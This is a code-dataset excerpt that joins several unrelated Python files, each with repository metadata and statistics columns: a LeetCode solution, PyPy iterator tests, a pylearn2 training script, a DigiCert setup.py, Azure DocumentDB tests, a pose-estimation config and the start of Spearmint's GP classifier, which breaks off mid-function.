] | null | null | null | strings/#387/strings.py | sharmarkei/DSA-Practice | c98e9f5ae1824d86f02d1002d908dc24c8be8812 | [
"MIT"
] | null | null | null | strings/#387/strings.py | sharmarkei/DSA-Practice | c98e9f5ae1824d86f02d1002d908dc24c8be8812 | [
"MIT"
] | null | null | null | class Solution(object):
def firstUniqChar(self, s):
"""
:type s: str
:rtype: int
"""
dict_1 = {}
for i in s:
if i not in dict_1:
dict_1[i] = 1
else:
dict_1[i] += 1
print(dict_1)
for idx, val in enumerate(s):
if dict_1[val] == 1:
return idx
return -1
| 20.318182 | 37 | 0.364653 | 51 | 447 | 3.078431 | 0.470588 | 0.191083 | 0.101911 | 0.089172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04878 | 0.541387 | 447 | 22 | 38 | 20.318182 | 0.717073 | 0.053691 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0 | 0 | 0.307692 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3d01a6d5b6d4e91e1847f49e77097d90f67ce9c | 906 | py | Python | pypy/module/cpyext/test/test_iterator.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
] | 34 | 2015-07-09T04:53:27.000Z | 2021-07-19T05:22:27.000Z | pypy/module/cpyext/test/test_iterator.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
] | 6 | 2015-05-30T17:20:45.000Z | 2017-06-12T14:29:23.000Z | pypy/module/cpyext/test/test_iterator.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
] | 11 | 2015-09-07T14:26:08.000Z | 2020-04-10T07:20:41.000Z | from pypy.module.cpyext.test.test_api import BaseApiTest
class TestIterator(BaseApiTest):
def test_check_iter(self, space, api):
assert api.PyIter_Check(space.iter(space.wrap("a")))
assert api.PyIter_Check(space.iter(space.newlist([])))
assert not api.PyIter_Check(space.w_type)
assert not api.PyIter_Check(space.wrap(2))
def test_getIter(self, space, api):
w_iter = api.PyObject_GetIter(space.wrap([1, 2, 3]))
assert space.unwrap(api.PyIter_Next(w_iter)) == 1
assert space.unwrap(api.PyIter_Next(w_iter)) == 2
assert space.unwrap(api.PyIter_Next(w_iter)) == 3
assert api.PyIter_Next(w_iter) is None
assert not api.PyErr_Occurred()
def test_iternext_error(self,space, api):
assert api.PyIter_Next(space.w_None) is None
assert api.PyErr_Occurred() is space.w_TypeError
api.PyErr_Clear()
| 39.391304 | 62 | 0.684327 | 135 | 906 | 4.392593 | 0.281481 | 0.136594 | 0.109612 | 0.128162 | 0.482293 | 0.451939 | 0.291737 | 0.177066 | 0 | 0 | 0 | 0.009642 | 0.198676 | 906 | 22 | 63 | 41.181818 | 0.807163 | 0 | 0 | 0 | 0 | 0 | 0.001104 | 0 | 0 | 0 | 0 | 0 | 0.611111 | 1 | 0.166667 | false | 0 | 0.055556 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3d41214e53cc3ba9f42c3c82841438366d8ce1d | 2,812 | py | Python | pylearn2/neuroimaging_utils/tutorials/nice/jobman/simple_train.py | rdevon/pylearn2 | f7b9a6ea0e2498176b47202f5bb83aec4976e1dd | [
"BSD-3-Clause"
] | 1 | 2017-10-29T06:18:35.000Z | 2017-10-29T06:18:35.000Z | pylearn2/neuroimaging_utils/tutorials/nice/jobman/simple_train.py | rdevon/pylearn2 | f7b9a6ea0e2498176b47202f5bb83aec4976e1dd | [
"BSD-3-Clause"
] | null | null | null | pylearn2/neuroimaging_utils/tutorials/nice/jobman/simple_train.py | rdevon/pylearn2 | f7b9a6ea0e2498176b47202f5bb83aec4976e1dd | [
"BSD-3-Clause"
] | null | null | null | """
Module to train a simple MLP for demo.
"""
from jobman.tools import expand
from jobman.tools import flatten
import logging
import nice_experiment
import numpy as np
from os import path
from pylearn2.config import yaml_parse
from pylearn2.neuroimaging_utils.datasets import MRI
from pylearn2.neuroimaging_utils.dataset_utils import mri_nifti
from pylearn2.scripts.jobman.experiment import ydict
from pylearn2.utils import serial
logging.basicConfig(format="[%(module)s:%(levelname)s]:%(message)s")
logger = logging.getLogger(__name__)
yaml_file = nice_experiment.yaml_file
def main(dataset_name="smri"):
logger.info("Getting dataset info for %s" % args.dataset_name)
data_path = serial.preprocess("${PYLEARN2_NI_PATH}/" + args.dataset_name)
mask_file = path.join(data_path, "mask.npy")
mask = np.load(mask_file)
input_dim = (mask == 1).sum()
if input_dim % 2 == 1:
input_dim -= 1
mri = MRI.MRI_Standard(which_set="full",
dataset_name=args.dataset_name,
unit_normalize=True,
even_input=True,
apply_mask=True)
variance_map_file = path.join(data_path, "variance_map.npy")
mri_nifti.save_variance_map(mri, variance_map_file)
user = path.expandvars("$USER")
save_path = serial.preprocess("/export/mialab/users/%s/pylearn2_outs/%s"
% (user, "nice_jobman_test"))
file_params = {"save_path": save_path,
"variance_map_file": variance_map_file
}
yaml_template = open(yaml_file).read()
hyperparams = expand(flatten(nice_experiment.default_hyperparams(input_dim=input_dim)),
dict_type=ydict)
for param in hyperparams:
if hasattr(args, param) and getattr(args, param):
val = getattr(args, param)
logger.info("Filling %s with %r" % (param, val))
hyperparams[param] = type(hyperparams[param])(val)
elif param == "weight_decay":
val = getattr(args, "l1_decay")
if val == 0.0:
hyperparams["weight_decay"] = ""
else:
hyperparams["weight_decay"] = {
"__builder__": "pylearn2.costs.mlp.L1WeightDecay",
"coeffs": {"z": val}
}
for param in file_params:
yaml_template = yaml_template.replace("%%(%s)s" % param, file_params[param])
yaml = yaml_template % hyperparams
print yaml
logger.info("Training")
train = yaml_parse.load(yaml)
train.main_loop()
if __name__ == "__main__":
parser = nice_experiment.make_argument_parser()
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
main(args)
| 34.292683 | 91 | 0.629445 | 339 | 2,812 | 4.967552 | 0.353982 | 0.039192 | 0.035629 | 0.024941 | 0.023753 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007703 | 0.26138 | 2,812 | 81 | 92 | 34.716049 | 0.803081 | 0 | 0 | 0 | 0 | 0 | 0.12256 | 0.039769 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.169231 | null | null | 0.015385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3d9152a0002e3e05bd42184c7b5ca8570672123 | 1,046 | py | Python | setup.py | digicert/digicert_express | 292fb4e7f8a39e53c384a79c50a9488c51258f97 | [
"MIT"
] | 2 | 2017-03-03T20:37:29.000Z | 2018-06-01T22:22:15.000Z | setup.py | digicert/digicert_express | 292fb4e7f8a39e53c384a79c50a9488c51258f97 | [
"MIT"
] | null | null | null | setup.py | digicert/digicert_express | 292fb4e7f8a39e53c384a79c50a9488c51258f97 | [
"MIT"
] | 2 | 2018-01-26T07:11:42.000Z | 2019-03-06T23:30:39.000Z | from setuptools import setup, find_packages
def readme():
with open('README.rst') as f:
return f.read()
setup(
name='digicert-express',
version='1.1dev2',
description='Express Install for DigiCert, Inc.',
long_description=readme(),
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: MIT License',
'Topic :: Security',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
],
url='https://github.com/digicert/digicert_express',
author='DigiCert, Inc.',
author_email='support@digicert.com',
license='MIT',
zip_safe=False,
packages=find_packages(exclude=['tests.*', '*.tests.*', '*.tests', 'tests', 'scripts']),
include_package_data=True,
install_requires=[
'python-augeas',
'requests>=2.8.1',
'ndg-httpsclient',
'pyasn1',
'pyOpenSSL' # prefer OS install but we can try here, too
],
)
| 29.885714 | 92 | 0.605163 | 113 | 1,046 | 5.522124 | 0.707965 | 0.048077 | 0.080128 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015075 | 0.239006 | 1,046 | 34 | 93 | 30.764706 | 0.768844 | 0.040153 | 0 | 0.0625 | 0 | 0 | 0.443114 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | true | 0 | 0.03125 | 0 | 0.09375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3da2efce64cb5f88a134e97d2a4092ee8ea80bb | 5,777 | py | Python | azure-mgmt/tests/test_mgmt_documentdb.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 4 | 2016-06-17T23:25:29.000Z | 2022-03-30T22:37:45.000Z | azure-mgmt/tests/test_mgmt_documentdb.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt/tests/test_mgmt_documentdb.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 3 | 2016-05-03T20:49:46.000Z | 2017-10-05T21:05:27.000Z | # coding: utf-8
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import unittest
import azure.mgmt.documentdb
from msrestazure.azure_exceptions import CloudError
from testutils.common_recordingtestcase import record
from tests.mgmt_testcase import HttpStatusCode, AzureMgmtTestCase
import logging
#logging.basicConfig(level=logging.DEBUG)
class MgmtDocDBTest(AzureMgmtTestCase):
def setUp(self):
super(MgmtDocDBTest, self).setUp()
self.client = self.create_mgmt_client(
azure.mgmt.documentdb.DocumentDB
)
# I don't record resource group creation, since it's another package
if not self.is_playback():
self.create_resource_group()
@record
def test_accounts_create(self):
account_name = self.get_resource_name('pydocdbtst')
self.assertFalse(self.client.database_accounts.check_name_exists(account_name))
async_docdb_create = self.client.database_accounts.create_or_update(
self.group_name,
account_name,
{
'location': self.region,
'locations': [{
'location_name': self.region
}]
}
)
account = async_docdb_create.result()
self.assertIsNotNone(account)
# Rest API issue
# self.assertEqual(account.name, account_name)
def test_accounts_features(self):
account_name = self.get_resource_name('pydocdbtest')
if not self.is_playback():
async_docdb_create = self.client.database_accounts.create_or_update(
self.group_name,
account_name,
{
'location': self.region,
'locations': [{
'location_name': self.region
}]
}
)
async_docdb_create.wait()
with self.recording():
account = self.client.database_accounts.get(
self.group_name,
account_name
)
self.assertEqual(account.name, account_name)
my_accounts = list(self.client.database_accounts.list_by_resource_group(self.group_name))
self.assertEqual(len(my_accounts), 1)
self.assertEqual(my_accounts[0].name, account_name)
my_accounts = list(self.client.database_accounts.list())
self.assertTrue(len(my_accounts) >= 1)
self.assertTrue(any(db.name == account_name for db in my_accounts))
# I guess we can make this test with no error, need to check with DocDB team
# This is an interesting test anyway, this implies that the serialization works
# and error message is available. Since this method does not return an object
# (i.e. no deserialization to test), this is a complete test.
# We are NOT here to test the RestAPI, but the Swagger file and Python code.
with self.assertRaises(CloudError) as cm:
async_change = self.client.database_accounts.failover_priority_change(
self.group_name,
account_name,
[{
'location_name': self.region,
'failover_priority': 0
}]
)
async_change.wait()
self.assertIn('Failover priorities must be unique', cm.exception.message)
my_keys = self.client.database_accounts.list_keys(
self.group_name,
account_name
)
self.assertIsNotNone(my_keys.primary_master_key)
self.assertIsNotNone(my_keys.secondary_master_key)
self.assertIsNotNone(my_keys.primary_readonly_master_key)
self.assertIsNotNone(my_keys.secondary_readonly_master_key)
my_keys = self.client.database_accounts.list_read_only_keys(
self.group_name,
account_name
)
self.assertIsNotNone(my_keys.primary_readonly_master_key)
self.assertIsNotNone(my_keys.secondary_readonly_master_key)
async_regenerate = self.client.database_accounts.regenerate_key(
self.group_name,
account_name,
"primary"
)
async_regenerate.wait()
def test_accounts_delete(self):
account_name = self.get_resource_name('pydocumentdbtst')
if not self.is_playback():
async_docdb_create = self.client.database_accounts.create_or_update(
self.group_name,
account_name,
{
'location': self.region,
'locations': [{
'location_name': self.region
}]
}
)
async_docdb_create.wait()
with self.recording():
# Current implementation of msrestazure does not support 404 as a end of LRO delete
# https://github.com/Azure/msrestazure-for-python/issues/7
async_delete = self.client.database_accounts.delete(self.group_name, account_name)
try:
async_delete.wait()
except CloudError as err:
if err.response.status_code != 404:
raise
#------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| 37.512987 | 101 | 0.570885 | 581 | 5,777 | 5.435456 | 0.313253 | 0.066181 | 0.061748 | 0.098797 | 0.427169 | 0.394554 | 0.355288 | 0.286574 | 0.286574 | 0.286574 | 0 | 0.003047 | 0.318331 | 5,777 | 153 | 102 | 37.75817 | 0.798629 | 0.183313 | 0 | 0.390909 | 0 | 0 | 0.043636 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 0 | null | null | 0 | 0.054545 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3da88558c778364e49a959d5f0d8f942db1cc43 | 3,758 | py | Python | config.py | somritabanerjee/speedplusbaseline | 5913c611d8c182ad8070abcf5f1baffc554dfd90 | [
"MIT"
] | null | null | null | config.py | somritabanerjee/speedplusbaseline | 5913c611d8c182ad8070abcf5f1baffc554dfd90 | [
"MIT"
] | null | null | null | config.py | somritabanerjee/speedplusbaseline | 5913c611d8c182ad8070abcf5f1baffc554dfd90 | [
"MIT"
] | null | null | null | import argparse
PROJROOTDIR = {'mac': '/Users/taehapark/SLAB/speedplusbaseline',
'linux': '/home/somrita/Documents/Satellite_Pose_Estimation/speedplusbaseline'}
DATAROOTDIR = {'mac': '/Users/taehapark/SLAB/speedplus/data/datasets',
'linux': '/home/somrita/Documents/Satellite_Pose_Estimation/dataset'}
parser = argparse.ArgumentParser('Configurations for SPEED+ Baseline Study')
# ------------------------------------------------------------------------------------------
# Basic directories and names
parser.add_argument('--seed', type=int, default=2021)
parser.add_argument('--projroot', type=str, default=PROJROOTDIR['linux'])
parser.add_argument('--dataroot', type=str, default=DATAROOTDIR['linux'])
parser.add_argument('--dataname', type=str, default='speedplus')
parser.add_argument('--savedir', type=str, default='checkpoints/synthetic/krn')
parser.add_argument('--resultfn', type=str, default='')
parser.add_argument('--logdir', type=str, default='log/synthetic/krn')
parser.add_argument('--pretrained', type=str, default='')
# ------------------------------------------------------------------------------------------
# Model config.
parser.add_argument('--model_name', type=str, default='krn')
parser.add_argument('--input_shape', nargs='+', type=int, default=(224, 224))
parser.add_argument('--num_keypoints', type=int, default=11) # KRN-specific
parser.add_argument('--num_classes', type=int, default=5000) # SPN-specific
parser.add_argument('--num_neighbors', type=int, default=5) # SPN-specific
parser.add_argument('--keypts_3d_model', type=str, default='src/utils/tangoPoints.mat')
parser.add_argument('--attitude_class', type=str, default='src/utils/attitudeClasses.mat')
# ------------------------------------------------------------------------------------------
# Training config.
parser.add_argument('--start_over', dest='auto_resume', action='store_false', default=True)
parser.add_argument('--randomize_texture', dest='randomize_texture', action='store_true', default=False)
parser.add_argument('--perform_dann', dest='dann', action='store_true', default=False)
parser.add_argument('--texture_alpha', type=float, default=0.5)
parser.add_argument('--texture_ratio', type=float, default=0.5)
parser.add_argument('--use_fp16', dest='fp16', action='store_true', default=False)
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--max_epochs', type=int, default=75)
parser.add_argument('--num_workers', type=int, default=8)
parser.add_argument('--test_epoch', type=int, default=-1)
parser.add_argument('--optimizer', type=str, default='rmsprop')
parser.add_argument('--lr', type=float, default=0.001)
parser.add_argument('--momentum', type=float, default=0.9)
parser.add_argument('--weight_decay', type=float, default=5e-5)
parser.add_argument('--lr_decay_alpha', type=float, default=0.96)
parser.add_argument('--lr_decay_step', type=int, default=1)
# ------------------------------------------------------------------------------------------
# Dataset-related inputs
parser.add_argument('--train_domain', type=str, default='synthetic')
parser.add_argument('--test_domain', type=str, default='lightbox')
parser.add_argument('--train_csv', type=str, default='train.csv')
parser.add_argument('--test_csv', type=str, default='lightbox.csv')
# ------------------------------------------------------------------------------------------
# Other miscellaneous settings
parser.add_argument('--gpu_id', type=int, default=0)
parser.add_argument('--no_cuda', dest='use_cuda', action='store_false', default=True)
# End
cfg = parser.parse_args() | 58.71875 | 104 | 0.631453 | 428 | 3,758 | 5.359813 | 0.313084 | 0.145161 | 0.274194 | 0.037053 | 0.268527 | 0.129904 | 0.129904 | 0.088056 | 0 | 0 | 0 | 0.013235 | 0.095263 | 3,758 | 64 | 105 | 58.71875 | 0.661471 | 0.161788 | 0 | 0 | 0 | 0 | 0.308992 | 0.091518 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022727 | 0 | 0.022727 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3df3020e02d0033dd7ab9554f7528acd2742527 | 21,764 | py | Python | spearmint/models/gp_classifier.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | null | null | null | spearmint/models/gp_classifier.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | null | null | null | spearmint/models/gp_classifier.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | null | null | null | # -*- coding: utf-8 -*-
# Spearmint
#
# Academic and Non-Commercial Research Use Software License and Terms
# of Use
#
# Spearmint is a software package to perform Bayesian optimization
# according to specific algorithms (the “Software”). The Software is
# designed to automatically run experiments (thus the code name
# 'spearmint') in a manner that iteratively adjusts a number of
# parameters so as to minimize some objective in as few runs as
# possible.
#
# The Software was developed by Ryan P. Adams, Michael Gelbart, and
# Jasper Snoek at Harvard University, Kevin Swersky at the
# University of Toronto (“Toronto”), and Hugo Larochelle at the
# Université de Sherbrooke (“Sherbrooke”), which assigned its rights
# in the Software to Socpra Sciences et Génie
# S.E.C. (“Socpra”). Pursuant to an inter-institutional agreement
# between the parties, it is distributed for free academic and
# non-commercial research use by the President and Fellows of Harvard
# College (“Harvard”).
#
# Using the Software indicates your agreement to be bound by the terms
# of this Software Use Agreement (“Agreement”). Absent your agreement
# to the terms below, you (the “End User”) have no rights to hold or
# use the Software whatsoever.
#
# Harvard agrees to grant hereunder the limited non-exclusive license
# to End User for the use of the Software in the performance of End
# User’s internal, non-commercial research and academic use at End
# User’s academic or not-for-profit research institution
# (“Institution”) on the following terms and conditions:
#
# 1. NO REDISTRIBUTION. The Software remains the property Harvard,
# Toronto and Socpra, and except as set forth in Section 4, End User
# shall not publish, distribute, or otherwise transfer or make
# available the Software to any other party.
#
# 2. NO COMMERCIAL USE. End User shall not use the Software for
# commercial purposes and any such use of the Software is expressly
# prohibited. This includes, but is not limited to, use of the
# Software in fee-for-service arrangements, core facilities or
# laboratories or to provide research services to (or in collaboration
# with) third parties for a fee, and in industry-sponsored
# collaborative research projects where any commercial rights are
# granted to the sponsor. If End User wishes to use the Software for
# commercial purposes or for any other restricted purpose, End User
# must execute a separate license agreement with Harvard.
#
# Requests for use of the Software for commercial purposes, please
# contact:
#
# Office of Technology Development
# Harvard University
# Smith Campus Center, Suite 727E
# 1350 Massachusetts Avenue
# Cambridge, MA 02138 USA
# Telephone: (617) 495-3067
# Facsimile: (617) 495-9568
# E-mail: otd@harvard.edu
#
# 3. OWNERSHIP AND COPYRIGHT NOTICE. Harvard, Toronto and Socpra own
# all intellectual property in the Software. End User shall gain no
# ownership to the Software. End User shall not remove or delete and
# shall retain in the Software, in any modifications to Software and
# in any Derivative Works, the copyright, trademark, or other notices
# pertaining to Software as provided with the Software.
#
# 4. DERIVATIVE WORKS. End User may create and use Derivative Works,
# as such term is defined under U.S. copyright laws, provided that any
# such Derivative Works shall be restricted to non-commercial,
# internal research and academic use at End User’s Institution. End
# User may distribute Derivative Works to other Institutions solely
# for the performance of non-commercial, internal research and
# academic use on terms substantially similar to this License and
# Terms of Use.
#
# 5. FEEDBACK. In order to improve the Software, comments from End
# Users may be useful. End User agrees to provide Harvard with
# feedback on the End User’s use of the Software (e.g., any bugs in
# the Software, the user experience, etc.). Harvard is permitted to
# use such information provided by End User in making changes and
# improvements to the Software without compensation or an accounting
# to End User.
#
# 6. NON ASSERT. End User acknowledges that Harvard, Toronto and/or
# Sherbrooke or Socpra may develop modifications to the Software that
# may be based on the feedback provided by End User under Section 5
# above. Harvard, Toronto and Sherbrooke/Socpra shall not be
# restricted in any way by End User regarding their use of such
# information. End User acknowledges the right of Harvard, Toronto
# and Sherbrooke/Socpra to prepare, publish, display, reproduce,
# transmit and or use modifications to the Software that may be
# substantially similar or functionally equivalent to End User’s
# modifications and/or improvements if any. In the event that End
# User obtains patent protection for any modification or improvement
# to Software, End User agrees not to allege or enjoin infringement of
# End User’s patent against Harvard, Toronto or Sherbrooke or Socpra,
# or any of the researchers, medical or research staff, officers,
# directors and employees of those institutions.
#
# 7. PUBLICATION & ATTRIBUTION. End User has the right to publish,
# present, or share results from the use of the Software. In
# accordance with customary academic practice, End User will
# acknowledge Harvard, Toronto and Sherbrooke/Socpra as the providers
# of the Software and may cite the relevant reference(s) from the
# following list of publications:
#
# Practical Bayesian Optimization of Machine Learning Algorithms
# Jasper Snoek, Hugo Larochelle and Ryan Prescott Adams
# Neural Information Processing Systems, 2012
#
# Multi-Task Bayesian Optimization
# Kevin Swersky, Jasper Snoek and Ryan Prescott Adams
# Advances in Neural Information Processing Systems, 2013
#
# Input Warping for Bayesian Optimization of Non-stationary Functions
# Jasper Snoek, Kevin Swersky, Richard Zemel and Ryan Prescott Adams
# Preprint, arXiv:1402.0929, http://arxiv.org/abs/1402.0929, 2013
#
# Bayesian Optimization and Semiparametric Models with Applications to
# Assistive Technology Jasper Snoek, PhD Thesis, University of
# Toronto, 2013
#
# 8. NO WARRANTIES. THE SOFTWARE IS PROVIDED "AS IS." TO THE FULLEST
# EXTENT PERMITTED BY LAW, HARVARD, TORONTO AND SHERBROOKE AND SOCPRA
# HEREBY DISCLAIM ALL WARRANTIES OF ANY KIND (EXPRESS, IMPLIED OR
# OTHERWISE) REGARDING THE SOFTWARE, INCLUDING BUT NOT LIMITED TO ANY
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE, OWNERSHIP, AND NON-INFRINGEMENT. HARVARD, TORONTO AND
# SHERBROOKE AND SOCPRA MAKE NO WARRANTY ABOUT THE ACCURACY,
# RELIABILITY, COMPLETENESS, TIMELINESS, SUFFICIENCY OR QUALITY OF THE
# SOFTWARE. HARVARD, TORONTO AND SHERBROOKE AND SOCPRA DO NOT WARRANT
# THAT THE SOFTWARE WILL OPERATE WITHOUT ERROR OR INTERRUPTION.
#
# 9. LIMITATIONS OF LIABILITY AND REMEDIES. USE OF THE SOFTWARE IS AT
# END USER’S OWN RISK. IF END USER IS DISSATISFIED WITH THE SOFTWARE,
# ITS EXCLUSIVE REMEDY IS TO STOP USING IT. IN NO EVENT SHALL
# HARVARD, TORONTO OR SHERBROOKE OR SOCPRA BE LIABLE TO END USER OR
# ITS INSTITUTION, IN CONTRACT, TORT OR OTHERWISE, FOR ANY DIRECT,
# INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR OTHER
# DAMAGES OF ANY KIND WHATSOEVER ARISING OUT OF OR IN CONNECTION WITH
# THE SOFTWARE, EVEN IF HARVARD, TORONTO OR SHERBROOKE OR SOCPRA IS
# NEGLIGENT OR OTHERWISE AT FAULT, AND REGARDLESS OF WHETHER HARVARD,
# TORONTO OR SHERBROOKE OR SOCPRA IS ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGES.
#
# 10. INDEMNIFICATION. To the extent permitted by law, End User shall
# indemnify, defend and hold harmless Harvard, Toronto and Sherbrooke
# and Socpra, their corporate affiliates, current or future directors,
# trustees, officers, faculty, medical and professional staff,
# employees, students and agents and their respective successors,
# heirs and assigns (the "Indemnitees"), against any liability,
# damage, loss or expense (including reasonable attorney's fees and
# expenses of litigation) incurred by or imposed upon the Indemnitees
# or any one of them in connection with any claims, suits, actions,
# demands or judgments arising from End User’s breach of this
# Agreement or its Institution’s use of the Software except to the
# extent caused by the gross negligence or willful misconduct of
# Harvard, Toronto or Sherbrooke or Socpra. This indemnification
# provision shall survive expiration or termination of this Agreement.
#
# 11. GOVERNING LAW. This Agreement shall be construed and governed by
# the laws of the Commonwealth of Massachusetts regardless of
# otherwise applicable choice of law standards.
#
# 12. NON-USE OF NAME. Nothing in this License and Terms of Use shall
# be construed as granting End Users or their Institutions any rights
# or licenses to use any trademarks, service marks or logos associated
# with the Software. You may not use the terms “Harvard” or
# “University of Toronto” or “Université de Sherbrooke” or “Socpra
# Sciences et Génie S.E.C.” (or a substantially similar term) in any
# way that is inconsistent with the permitted uses described
# herein. You agree not to use any name or emblem of Harvard, Toronto
# or Sherbrooke, or any of their subdivisions for any purpose, or to
# falsely suggest any relationship between End User (or its
# Institution) and Harvard, Toronto and/or Sherbrooke, or in any
# manner that would infringe or violate any of their rights.
#
# 13. End User represents and warrants that it has the legal authority
# to enter into this License and Terms of Use on behalf of itself and
# its Institution.
import copy
import sys, logging
import numpy as np
import numpy.random as npr
import scipy.linalg as spla
import scipy.optimize as spo
import scipy.io as sio
import scipy.stats as sps
try:
import scipy.weave as weave
except ImportError:
import weave
from .gp import GP
from ..utils.param import Param as Hyperparameter
from ..kernels import Matern52, Noise, Scale, SumKernel, TransformKernel
from ..sampling.slice_sampler import SliceSampler
from ..sampling.whitened_prior_slice_sampler import WhitenedPriorSliceSampler
from ..sampling.elliptical_slice_sampler import EllipticalSliceSampler
from ..utils import priors
from ..transformations import BetaWarp, Transformer
try:
module = sys.modules['__main__'].__file__
log = logging.getLogger(module)
except:
log = logging.getLogger()
print 'Not running from main.'
class GPClassifier(GP):
def __init__(self, num_dims, **options):
self.counts = None
log.debug('GP Classifier initialized with options: %s' % (options))
self.ess_thinning = int(options.get("ess-thinning", 10))
self._set_likelihood(options)
self.prior_whitening = options.get('prior-whitening', True)
sigmoid = options.get("sigmoid", "probit")
if not self.noiseless:
if sigmoid == "probit":
self.sigmoid = sps.norm.cdf
self.sigmoid_derivative = sps.norm.pdf # not used
self.sigmoid_inverse = sps.norm.ppf
elif sigmoid == "logistic":
self.sigmoid = sps.logistic.cdf
self.sigmoid_derivative = sps.logistic.pdf
self.sigmoid_inverse = sps.logistic.ppf
else:
raise Exception("Only probit and logistic sigmoids are supported")
else:
# If no noise we use the step function and ignore the "sigmoid" argument.
# (This is the step function likelihood)
# assert options['likelihood'] == 'STEP'
self.sigmoid = lambda x: np.greater_equal(x, 0)
self.sigmoid_derivative = lambda x: 0.
self.sigmoid_inverse = lambda x: 0.
# The constraint is that p=s(f) > 1-epsilon
# where s if the sigmoid and f is the latent function value, and p is the binomial probability
# This is only in more complicated situations. The main situation where this is used
# we want f>0. This is equivalent to epsilon=0.5 for the sigmoids we use
# The point is: do not set epsilon unless you know what you are doing!
# (and do not confuse it with delta, the min constraint confidence)
self._one_minus_epsilon = 1.0 - float(options.get("epsilon", 0.5))
self.latent_values_list = []
super(GPClassifier, self).__init__(num_dims, **options)
def _set_likelihood(self, options):
self.likelihood = options.get('likelihood', 'binomial').lower()
if self.likelihood.lower() == "binomial":
self.noiseless = False
elif self.likelihood.lower() == "step":
self.noiseless = True
else:
raise Exception("GP classifier only supports step or binomial likelihood, not %s" % (options['likelihood']))
def _reset(self):
super(GPClassifier, self)._reset()
# Reset the latent values
if self.counts is not None:
initial_latent_vals = self.counts - 0.5
else:
initial_latent_vals = np.zeros(0)
self.latent_values.initial_value = initial_latent_vals
self.latent_values.reset_value()
self._latent_values_list = []
def _set_latent_values_from_dict(self, latent_values_dict):
# Read in the latent values. For pre-existing data, just load them in
# For new data, set them to a default.
default_latent_values = self.counts - 0.5
latent_values = np.zeros(self._inputs.shape[0])
for i in xrange(self._inputs.shape[0]):
key = str(hash(self._inputs[i].tostring()))
if key in latent_values_dict:
